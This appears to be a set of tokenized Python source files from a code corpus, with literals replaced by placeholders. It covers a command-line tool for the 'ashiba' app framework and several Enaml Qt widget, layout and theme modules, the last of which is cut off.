<s> import re <EOL> import sys <EOL> import copy <EOL> import json <EOL> import time <EOL> import shutil <EOL> import urllib2 <EOL> import tempfile <EOL> import os , os . path <EOL> import multiprocessing as mp <EOL> from contextlib import closing , contextmanager <EOL> import webbrowser <EOL> import ashiba , ashiba . utils <EOL> ASHIBA_SHARE = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> print '<STR_LIT>' , ASHIBA_SHARE <EOL> @ contextmanager <EOL> def stay ( ) : <EOL> oldpath = sys . path <EOL> oldcwd = os . getcwd ( ) <EOL> yield <EOL> os . chdir ( oldcwd ) <EOL> sys . path = oldpath <EOL> def stay_put ( fcn ) : <EOL> def decorated_fcn ( * args , ** kwargs ) : <EOL> with stay ( ) : <EOL> return fcn ( * args , ** kwargs ) <EOL> return decorated_fcn <EOL> def get_mtimes ( path ) : <EOL> mtimes = { } <EOL> for root , dirs , files in os . walk ( path ) : <EOL> if os . path . join ( path , '<STR_LIT>' ) not in root : <EOL> for fname in files : <EOL> if not ( fname . startswith ( '<STR_LIT:.>' ) or fname . endswith ( '<STR_LIT>' ) ) : <EOL> fpath = os . path . join ( root , fname ) <EOL> mtimes [ fpath ] = os . path . getmtime ( fpath ) <EOL> return mtimes <EOL> def templatify_html ( in_file ) : <EOL> if isinstance ( in_file , file ) : <EOL> buf = in_file . read ( ) <EOL> else : <EOL> buf = in_file <EOL> for search_str in [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> if search_str not in buf : <EOL> buf = search_str + '<STR_LIT:\n>' + buf <EOL> search_str = '<STR_LIT>' <EOL> if search_str not in buf : <EOL> buf += '<STR_LIT:\n>' + search_str <EOL> return buf <EOL> @ stay_put <EOL> def _compile ( args ) : <EOL> path = args . path <EOL> os . chdir ( path ) <EOL> if os . getcwd ( ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import settings <EOL> SETTINGS = { k : v for k , v in vars ( settings ) . items ( ) if not k . startswith ( '<STR_LIT>' ) } <EOL> import handlers <EOL> if os . path . 
isfile ( '<STR_LIT>' ) : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> elif os . path . isdir ( '<STR_LIT>' ) : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> shutil . copytree ( <EOL> os . path . join ( ASHIBA_SHARE , '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> ENAML = False <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> compile_enaml ( '<STR_LIT>' ) <EOL> ENAML = True <EOL> for fname in [ x for x in os . listdir ( '<STR_LIT:.>' ) if not x . startswith ( '<STR_LIT:.>' ) ] : <EOL> root , ext = os . path . splitext ( fname ) <EOL> if ext in [ '<STR_LIT>' ] : <EOL> shutil . copy ( fname , os . path . join ( '<STR_LIT>' , fname ) ) <EOL> elif ext == '<STR_LIT>' : <EOL> if root != '<STR_LIT>' : <EOL> shutil . copy ( fname , os . path . join ( '<STR_LIT>' , '<STR_LIT>' , fname ) ) <EOL> elif not ENAML : <EOL> in_file = open ( fname ) <EOL> out_file = open ( os . path . join ( '<STR_LIT>' , '<STR_LIT>' , fname ) , '<STR_LIT:w>' ) <EOL> out_file . write ( templatify_html ( in_file ) ) <EOL> out_file . close ( ) <EOL> if os . path . isdir ( '<STR_LIT>' ) : <EOL> for item in [ os . path . join ( '<STR_LIT>' , x ) for x in os . listdir ( '<STR_LIT>' ) ] : <EOL> src , dst = item , os . path . join ( '<STR_LIT>' , item ) <EOL> if os . path . isdir ( item ) : <EOL> shutil . copytree ( src , dst ) <EOL> else : <EOL> shutil . copy ( src , dst ) <EOL> for item in SETTINGS . get ( '<STR_LIT>' , [ ] ) : <EOL> src , dst = item , os . path . join ( '<STR_LIT>' , item ) <EOL> try : <EOL> shutil . copy ( src , dst ) <EOL> except IOError : <EOL> print '<STR_LIT>' . format ( item ) <EOL> else : <EOL> print '<STR_LIT>' , item <EOL> file_path = os . path . join ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> print "<STR_LIT>" , os . path . abspath ( file_path ) <EOL> outfile = open ( file_path , '<STR_LIT:w>' ) <EOL> outfile . write ( "<STR_LIT>" . format ( ashiba . __version__ ) ) <EOL> outfile . write ( "<STR_LIT>" ) <EOL> fcn_names = [ k for k in vars ( handlers ) if re . 
match ( '<STR_LIT>' , k ) ] <EOL> for fcn_name in fcn_names : <EOL> print "<STR_LIT>" , fcn_name <EOL> name , event = fcn_name . rsplit ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> if name . startswith ( '<STR_LIT:_>' ) : <EOL> selector = '<STR_LIT:.>' <EOL> else : <EOL> selector = '<STR_LIT:#>' <EOL> jquery_string = """<STR_LIT>""" . format ( selector = selector , name = name . lstrip ( '<STR_LIT:_>' ) , event = event ) <EOL> outfile . write ( jquery_string ) <EOL> outfile . write ( "<STR_LIT>" ) <EOL> outfile . close ( ) <EOL> def _init ( args ) : <EOL> path = args . path <EOL> print "<STR_LIT>" , path <EOL> if os . path . exists ( path ) : <EOL> sys . exit ( "<STR_LIT>" . format ( <EOL> os . path . abspath ( path ) ) ) <EOL> shutil . copytree ( os . path . join ( ASHIBA_SHARE , '<STR_LIT>' ) , path ) <EOL> def _clean ( args ) : <EOL> for path in args . paths : <EOL> if os . path . isdir ( path ) : <EOL> clean_app_dir ( path ) <EOL> else : <EOL> print '<STR_LIT>' . format ( path ) <EOL> def clean_app_dir ( path ) : <EOL> for app_dir in [ os . path . join ( path , d ) for d in [ '<STR_LIT>' , '<STR_LIT>' ] ] : <EOL> if os . path . isdir ( app_dir ) : <EOL> print "<STR_LIT>" . format ( app_dir ) <EOL> shutil . rmtree ( app_dir ) <EOL> modified = os . path . join ( path , '<STR_LIT>' ) <EOL> if os . path . isfile ( modified ) : <EOL> os . remove ( modified ) <EOL> for root , dirs , files in os . walk ( path ) : <EOL> for fname in files : <EOL> if fname . endswith ( '<STR_LIT>' ) : <EOL> os . remove ( os . path . join ( root , fname ) ) <EOL> def compile_check ( args ) : <EOL> path = args . path <EOL> app_path = os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> mtimes = get_mtimes ( path ) <EOL> mtime_fname = os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> try : <EOL> old_mtimes = json . load ( open ( mtime_fname ) ) <EOL> except ( IOError , ValueError ) : <EOL> old_mtimes = { } <EOL> if ( not os . path . 
isdir ( app_path ) <EOL> or mtimes != old_mtimes <EOL> or vars ( args ) . get ( '<STR_LIT>' ) ) : <EOL> print "<STR_LIT>" <EOL> _compile ( args ) <EOL> mtimes = get_mtimes ( path ) <EOL> with closing ( open ( mtime_fname , '<STR_LIT:w>' ) ) as mtime_file : <EOL> json . dump ( mtimes , mtime_file ) <EOL> def _start ( args ) : <EOL> path = args . path <EOL> app_path = os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> compile_check ( args ) <EOL> print "<STR_LIT>" , app_path <EOL> sys . path . insert ( <NUM_LIT:0> , app_path ) <EOL> os . chdir ( app_path ) <EOL> initial_port = args . port <EOL> host , port = '<STR_LIT:localhost>' , ashiba . utils . get_port ( '<STR_LIT:localhost>' , initial_port ) <EOL> if vars ( args ) . get ( '<STR_LIT>' ) : <EOL> url = "<STR_LIT>" . format ( host , port ) <EOL> webbrowser . open_new ( url ) <EOL> import flask_loader <EOL> flask_loader . app . run ( host = host , port = port , <EOL> debug = True , <EOL> threaded = True , <EOL> use_reloader = False , ) <EOL> @ stay_put <EOL> def compile_enaml ( fpath ) : <EOL> print "<STR_LIT>" , fpath <EOL> abspath = os . path . abspath ( fpath ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> path , fname = os . path . split ( abspath ) <EOL> shutil . copy ( abspath , fname ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import enaml_loader <EOL> enaml_loader . main ( ) <EOL> root , ext = os . path . splitext ( fname ) <EOL> out_file = open ( os . path . join ( '<STR_LIT>' , root + '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> out_file . write ( templatify_html ( open ( root + '<STR_LIT>' ) ) ) <EOL> out_file . close ( ) <EOL> def _qt ( args ) : <EOL> compile_check ( args ) <EOL> initial_port = args . port <EOL> port = ashiba . utils . get_port ( '<STR_LIT:localhost>' , initial_port ) <EOL> server_args = copy . deepcopy ( args ) <EOL> server_args . port = port <EOL> server = mp . Process ( target = _start , args = ( server_args , ) ) <EOL> server . 
start ( ) <EOL> url = '<STR_LIT>' . format ( port ) <EOL> with stay ( ) : <EOL> os . chdir ( os . path . join ( args . path , '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import settings <EOL> if '<STR_LIT>' in vars ( settings ) : <EOL> icon = os . path . abspath ( settings . QT_ICON ) <EOL> elif '<STR_LIT>' in vars ( settings ) : <EOL> icon = os . path . abspath ( settings . APP_ICON ) <EOL> else : <EOL> icon = '<STR_LIT>' <EOL> if '<STR_LIT>' in vars ( settings ) : <EOL> name = settings . APP_NAME <EOL> else : <EOL> name = os . path . split ( args . path ) [ - <NUM_LIT:1> ] <EOL> name = "<STR_LIT>" + name <EOL> browser = mp . Process ( target = browse , args = ( url , name , icon ) ) <EOL> browser . start ( ) <EOL> browser . join ( ) <EOL> print "<STR_LIT>" <EOL> server . terminate ( ) <EOL> sys . exit ( ) <EOL> def browse ( url , name = '<STR_LIT>' , icon = '<STR_LIT>' ) : <EOL> from PySide . QtGui import QApplication , QIcon <EOL> from PySide . QtCore import QUrl <EOL> from PySide . QtWebKit import QWebView <EOL> for try_ in range ( <NUM_LIT:10> ) : <EOL> try : <EOL> assert urllib2 . urlopen ( url ) . code == <NUM_LIT:200> <EOL> except ( AssertionError , urllib2 . URLError ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> else : <EOL> print "<STR_LIT>" % try_ <EOL> break <EOL> else : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> qtapp = QApplication ( name ) <EOL> web = QWebView ( ) <EOL> web . load ( QUrl ( url ) ) <EOL> if icon : <EOL> print "<STR_LIT>" , icon <EOL> web . setWindowIcon ( QIcon ( icon ) ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> web . setWindowTitle ( name ) <EOL> web . show ( ) <EOL> qtapp . exec_ ( ) <EOL> @ stay_put <EOL> def _build ( args ) : <EOL> path = args . path <EOL> os . chdir ( path ) <EOL> if os . getcwd ( ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import settings <EOL> SETTINGS = { k : v for k , v in vars ( settings ) . items ( ) if not k . 
startswith ( '<STR_LIT>' ) } <EOL> required_keys = [ '<STR_LIT>' ] <EOL> if len ( set ( required_keys ) - set ( SETTINGS . keys ( ) ) ) : <EOL> error_str = "<STR_LIT>" <EOL> for key in set ( required_keys ) - set ( SETTINGS . keys ( ) ) : <EOL> error_str += "<STR_LIT>" + key <EOL> sys . exit ( error_str ) <EOL> app_head = os . path . split ( os . getcwd ( ) ) [ - <NUM_LIT:1> ] <EOL> meta = { } <EOL> meta [ '<STR_LIT>' ] = { '<STR_LIT:name>' : app_head , <EOL> '<STR_LIT:version>' : <NUM_LIT:0.0> , <EOL> } <EOL> meta [ '<STR_LIT>' ] = { } <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> meta [ '<STR_LIT>' ] = { '<STR_LIT>' : "<STR_LIT>" . format ( app_head ) , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> } <EOL> if '<STR_LIT>' in SETTINGS : <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = os . path . join ( '<STR_LIT:..>' , '<STR_LIT:src>' , <EOL> app_head , SETTINGS [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in SETTINGS : <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = SETTINGS [ '<STR_LIT>' ] <EOL> binstar_path = SETTINGS . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> meta [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' + binstar_path , <EOL> '<STR_LIT>' : SETTINGS . get ( '<STR_LIT>' ) <EOL> } <EOL> build_dir = os . path . abspath ( '<STR_LIT>' ) <EOL> if os . path . isdir ( build_dir ) : <EOL> print "<STR_LIT>" . format ( build_dir ) <EOL> shutil . rmtree ( build_dir ) <EOL> source_dir = os . path . join ( '<STR_LIT>' , '<STR_LIT:src>' , app_head ) <EOL> temp_dir = os . path . join ( tempfile . mkdtemp ( ) , app_head ) <EOL> shutil . copytree ( os . getcwd ( ) , temp_dir ) <EOL> clean_app_dir ( temp_dir ) <EOL> shutil . copytree ( temp_dir , source_dir ) <EOL> os . mkdir ( os . path . join ( build_dir , '<STR_LIT>' ) ) <EOL> recipe_dir = os . path . join ( build_dir , '<STR_LIT>' ) <EOL> with closing ( open ( os . path . 
join ( recipe_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) ) as f_out : <EOL> f_out . write ( ashiba . utils . prettyaml ( meta ) ) <EOL> build_sh = """<STR_LIT>""" <EOL> with closing ( open ( os . path . join ( recipe_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) ) as f_out : <EOL> f_out . write ( build_sh ) <EOL> build_bat = """<STR_LIT>""" <EOL> with closing ( open ( os . path . join ( recipe_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) ) as f_out : <EOL> f_out . write ( build_bat ) <EOL> def _help ( args ) : <EOL> print "<STR_LIT>" <EOL> def main ( ) : <EOL> import argparse <EOL> if len ( sys . argv ) == <NUM_LIT:1> : <EOL> sys . argv . append ( '<STR_LIT>' ) <EOL> parser = argparse . ArgumentParser ( ) <EOL> subparsers = parser . add_subparsers ( ) <EOL> init = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> init . set_defaults ( func = _init ) <EOL> compile = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> compile . set_defaults ( func = _compile ) <EOL> start = subparsers . add_parser ( <EOL> "<STR_LIT:start>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> start . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = False , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> start . set_defaults ( func = _start ) <EOL> qt = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> qt . set_defaults ( func = _qt ) <EOL> build = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> build . set_defaults ( func = _build ) <EOL> clean = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> clean . set_defaults ( func = _clean ) <EOL> for subparser in ( init , compile , start , qt , build ) : <EOL> subparser . add_argument ( '<STR_LIT:path>' , help = '<STR_LIT>' ) <EOL> clean . 
add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:+>' , help = '<STR_LIT>' ) <EOL> port_kwargs = { <EOL> '<STR_LIT:action>' : '<STR_LIT:store>' , <EOL> '<STR_LIT:default>' : <NUM_LIT> , <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> for subparser in ( start , qt ) : <EOL> subparser . add_argument ( '<STR_LIT>' , ** port_kwargs ) <EOL> subparser . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = False , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> args = parser . parse_args ( ) <EOL> args . func ( args ) </s>
<s> from atom . api import Unicode , Event <EOL> from . declarative_meta import DeclarativeMeta <EOL> from . object import Object , flag_generator , flag_property <EOL> def d_ ( member , readable = True , writable = True , final = True ) : <EOL> """<STR_LIT>""" <EOL> metadata = member . metadata <EOL> if metadata is None : <EOL> metadata = member . metadata = { } <EOL> metadata [ '<STR_LIT>' ] = True <EOL> metadata [ '<STR_LIT>' ] = readable <EOL> metadata [ '<STR_LIT>' ] = writable <EOL> metadata [ '<STR_LIT>' ] = final <EOL> return member <EOL> INITIALIZED_FLAG = flag_generator . next ( ) <EOL> class Declarative ( Object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = DeclarativeMeta <EOL> name = d_ ( Unicode ( ) ) <EOL> initialized = d_ ( Event ( ) , writable = False ) <EOL> is_initialized = flag_property ( INITIALIZED_FLAG ) <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in self . children [ : ] : <EOL> if isinstance ( child , Declarative ) : <EOL> child . initialize ( ) <EOL> self . is_initialized = True <EOL> self . initialized ( ) <EOL> def destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . is_initialized = False <EOL> for op in type ( self ) . __eval_operators__ . itervalues ( ) : <EOL> op . release ( self ) <EOL> for oplist in type ( self ) . __notify_operators__ . itervalues ( ) : <EOL> for op in oplist : <EOL> op . release ( self ) <EOL> super ( Declarative , self ) . destroy ( ) <EOL> def child_added ( self , child ) : <EOL> """<STR_LIT>""" <EOL> super ( Declarative , self ) . child_added ( child ) <EOL> if isinstance ( child , Declarative ) : <EOL> if self . is_initialized and not child . is_initialized : <EOL> child . initialize ( ) <EOL> def _run_eval_operator ( self , name ) : <EOL> """<STR_LIT>""" <EOL> op = type ( self ) . __eval_operators__ . get ( name ) <EOL> if op is not None : <EOL> return op . 
eval ( self ) <EOL> return NotImplemented <EOL> def _run_notify_operator ( self , change ) : <EOL> """<STR_LIT>""" <EOL> oplist = type ( self ) . __notify_operators__ . get ( change [ '<STR_LIT:name>' ] ) <EOL> if oplist is not None : <EOL> for op in oplist : <EOL> op . notify ( change ) </s>
<s> from casuarius import Solver , medium <EOL> class LayoutManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _solver = Solver ( autosolve = False ) <EOL> self . _initialized = False <EOL> self . _running = False <EOL> def initialize ( self , constraints ) : <EOL> """<STR_LIT>""" <EOL> if self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> solver = self . _solver <EOL> solver . autosolve = False <EOL> for cn in constraints : <EOL> solver . add_constraint ( cn ) <EOL> solver . autosolve = True <EOL> self . _initialized = True <EOL> def replace_constraints ( self , old_cns , new_cns ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> solver = self . _solver <EOL> solver . autosolve = False <EOL> for cn in old_cns : <EOL> solver . remove_constraint ( cn ) <EOL> for cn in new_cns : <EOL> solver . add_constraint ( cn ) <EOL> solver . autosolve = True <EOL> def layout ( self , cb , width , height , size , strength = medium , weight = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if self . _running : <EOL> return <EOL> try : <EOL> self . _running = True <EOL> w , h = size <EOL> values = [ ( width , w ) , ( height , h ) ] <EOL> with self . _solver . suggest_values ( values , strength , weight ) : <EOL> cb ( ) <EOL> finally : <EOL> self . _running = False <EOL> def get_min_size ( self , width , height , strength = medium , weight = <NUM_LIT:0.1> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> values = [ ( width , <NUM_LIT:0.0> ) , ( height , <NUM_LIT:0.0> ) ] <EOL> with self . _solver . suggest_values ( values , strength , weight ) : <EOL> min_width = width . value <EOL> min_height = height . 
value <EOL> return ( min_width , min_height ) <EOL> def get_max_size ( self , width , height , strength = medium , weight = <NUM_LIT:0.1> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> max_val = <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> values = [ ( width , max_val ) , ( height , max_val ) ] <EOL> with self . _solver . suggest_values ( values , strength , weight ) : <EOL> max_width = width . value <EOL> max_height = height . value <EOL> width_diff = abs ( max_val - int ( round ( max_width ) ) ) <EOL> height_diff = abs ( max_val - int ( round ( max_height ) ) ) <EOL> if width_diff <= <NUM_LIT:1> : <EOL> max_width = - <NUM_LIT:1> <EOL> if height_diff <= <NUM_LIT:1> : <EOL> max_height = - <NUM_LIT:1> <EOL> return ( max_width , max_height ) </s>
<s> from enaml . qt . QtGui import QSplitter , QSplitterHandle <EOL> from . q_dock_area import QDockArea <EOL> class QDockSplitterHandle ( QSplitterHandle ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QDockSplitter ( QSplitter ) : <EOL> """<STR_LIT>""" <EOL> def createHandle ( self ) : <EOL> """<STR_LIT>""" <EOL> return QDockSplitterHandle ( self . orientation ( ) , self ) <EOL> def inheritOpaqueResize ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . parent ( ) <EOL> while p is not None : <EOL> if isinstance ( p , QDockArea ) : <EOL> self . setOpaqueResize ( p . opaqueItemResize ( ) ) <EOL> return <EOL> p = p . parent ( ) </s>
<s> from contextlib import contextmanager <EOL> from atom . api import List , Typed <EOL> from enaml . widgets . constraints_widget import ProxyConstraintsWidget <EOL> from . QtCore import QRect , QTimer <EOL> from . qt_widget import QtWidget <EOL> @ contextmanager <EOL> def size_hint_guard ( obj ) : <EOL> """<STR_LIT>""" <EOL> old_hint = obj . widget_item . sizeHint ( ) <EOL> yield <EOL> new_hint = obj . widget_item . sizeHint ( ) <EOL> if old_hint != new_hint : <EOL> obj . size_hint_updated ( ) <EOL> class QtConstraintsWidget ( QtWidget , ProxyConstraintsWidget ) : <EOL> """<STR_LIT>""" <EOL> size_hint_cns = List ( ) <EOL> layout_timer = Typed ( QTimer ) <EOL> def _default_size_hint_cns ( self ) : <EOL> """<STR_LIT>""" <EOL> cns = [ ] <EOL> hint = self . widget_item . sizeHint ( ) <EOL> if hint . isValid ( ) : <EOL> width_hint = hint . width ( ) <EOL> height_hint = hint . height ( ) <EOL> d = self . declaration <EOL> if width_hint >= <NUM_LIT:0> : <EOL> if d . hug_width != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . width == width_hint ) | d . hug_width ) <EOL> if d . resist_width != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . width >= width_hint ) | d . resist_width ) <EOL> if height_hint >= <NUM_LIT:0> : <EOL> if d . hug_height != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . height == height_hint ) | d . hug_height ) <EOL> if d . resist_height != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . height >= height_hint ) | d . resist_height ) <EOL> return cns <EOL> def request_relayout ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . layout_timer : <EOL> self . widget . setUpdatesEnabled ( False ) <EOL> self . layout_timer = timer = QTimer ( ) <EOL> timer . setSingleShot ( True ) <EOL> timer . timeout . connect ( self . on_layout_triggered ) <EOL> self . layout_timer . start ( ) <EOL> def on_layout_triggered ( self ) : <EOL> """<STR_LIT>""" <EOL> del self . layout_timer <EOL> self . relayout ( ) <EOL> self . widget . 
setUpdatesEnabled ( True ) <EOL> def relayout ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . parent ( ) <EOL> if isinstance ( parent , QtConstraintsWidget ) : <EOL> parent . relayout ( ) <EOL> def replace_constraints ( self , old_cns , new_cns ) : <EOL> """<STR_LIT>""" <EOL> parent = self . parent ( ) <EOL> if isinstance ( parent , QtConstraintsWidget ) : <EOL> parent . replace_constraints ( old_cns , new_cns ) <EOL> def size_hint_updated ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . parent ( ) <EOL> if isinstance ( parent , QtConstraintsWidget ) : <EOL> old_cns = self . size_hint_cns <EOL> del self . size_hint_cns <EOL> new_cns = self . size_hint_cns <EOL> parent . replace_constraints ( old_cns , new_cns ) <EOL> def geometry_updater ( self ) : <EOL> """<STR_LIT>""" <EOL> d = self . declaration <EOL> x = d . left <EOL> y = d . top <EOL> width = d . width <EOL> height = d . height <EOL> setgeo = self . widget_item . setGeometry <EOL> rect = QRect <EOL> def update_geometry ( dx , dy ) : <EOL> nx = x . value <EOL> ny = y . value <EOL> setgeo ( rect ( nx - dx , ny - dy , width . value , height . value ) ) <EOL> return nx , ny <EOL> update_geometry . item = self <EOL> return update_geometry </s>
<s> from atom . api import Int , Typed <EOL> from enaml . widgets . object_combo import ProxyObjectCombo <EOL> from . QtCore import QTimer <EOL> from . QtGui import QComboBox <EOL> from . q_resource_helpers import get_cached_qicon <EOL> from . qt_control import QtControl <EOL> SELECTED_GUARD = <NUM_LIT> <EOL> class ComboRefreshTimer ( QTimer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , owner ) : <EOL> """<STR_LIT>""" <EOL> super ( ComboRefreshTimer , self ) . __init__ ( ) <EOL> self . setSingleShot ( True ) <EOL> self . owner = owner <EOL> def timerEvent ( self , event ) : <EOL> """<STR_LIT>""" <EOL> super ( ComboRefreshTimer , self ) . timerEvent ( event ) <EOL> owner = self . owner <EOL> if owner is not None : <EOL> del owner . refresh_timer <EOL> self . owner = None <EOL> owner . refresh_items ( ) <EOL> class QtObjectCombo ( QtControl , ProxyObjectCombo ) : <EOL> """<STR_LIT>""" <EOL> widget = Typed ( QComboBox ) <EOL> refresh_timer = Typed ( ComboRefreshTimer ) <EOL> _guard = Int ( <NUM_LIT:0> ) <EOL> def _default_refresh_timer ( self ) : <EOL> """<STR_LIT>""" <EOL> return ComboRefreshTimer ( self ) <EOL> def create_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> self . widget = QComboBox ( self . parent_widget ( ) ) <EOL> self . widget . setInsertPolicy ( QComboBox . NoInsert ) <EOL> def init_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( QtObjectCombo , self ) . init_widget ( ) <EOL> self . refresh_items ( ) <EOL> self . widget . currentIndexChanged . connect ( self . on_index_changed ) <EOL> def on_index_changed ( self , index ) : <EOL> """<STR_LIT>""" <EOL> if not self . _guard & SELECTED_GUARD : <EOL> self . _guard |= SELECTED_GUARD <EOL> try : <EOL> item = self . declaration . items [ index ] <EOL> self . declaration . selected = item <EOL> finally : <EOL> self . _guard &= ~ SELECTED_GUARD <EOL> def refresh_items ( self ) : <EOL> """<STR_LIT>""" <EOL> d = self . declaration <EOL> selected = d . selected <EOL> to_string = d . 
to_string <EOL> to_icon = d . to_icon <EOL> widget = self . widget <EOL> self . _guard |= SELECTED_GUARD <EOL> try : <EOL> widget . clear ( ) <EOL> target_index = - <NUM_LIT:1> <EOL> for index , item in enumerate ( d . items ) : <EOL> text = to_string ( item ) <EOL> icon = to_icon ( item ) <EOL> if icon is None : <EOL> qicon = None <EOL> else : <EOL> qicon = get_cached_qicon ( icon ) <EOL> if qicon is None : <EOL> widget . addItem ( text ) <EOL> else : <EOL> widget . addItem ( qicon , text ) <EOL> if item == selected : <EOL> target_index = index <EOL> widget . setCurrentIndex ( target_index ) <EOL> finally : <EOL> self . _guard &= ~ SELECTED_GUARD <EOL> def set_selected ( self , selected ) : <EOL> """<STR_LIT>""" <EOL> if not self . _guard & SELECTED_GUARD : <EOL> self . _guard |= SELECTED_GUARD <EOL> try : <EOL> d = self . declaration <EOL> try : <EOL> index = d . items . index ( selected ) <EOL> except ValueError : <EOL> index = - <NUM_LIT:1> <EOL> self . widget . setCurrentIndex ( index ) <EOL> finally : <EOL> self . _guard &= ~ SELECTED_GUARD <EOL> def set_editable ( self , editable ) : <EOL> """<STR_LIT>""" <EOL> widget = self . widget <EOL> widget . setEditable ( editable ) <EOL> widget . update ( ) <EOL> def request_items_refresh ( self ) : <EOL> """<STR_LIT>""" <EOL> self . refresh_timer . start ( ) </s>
<s> from . mono_font import MONO_FONT <EOL> IDLE_THEME = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : MONO_FONT <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> 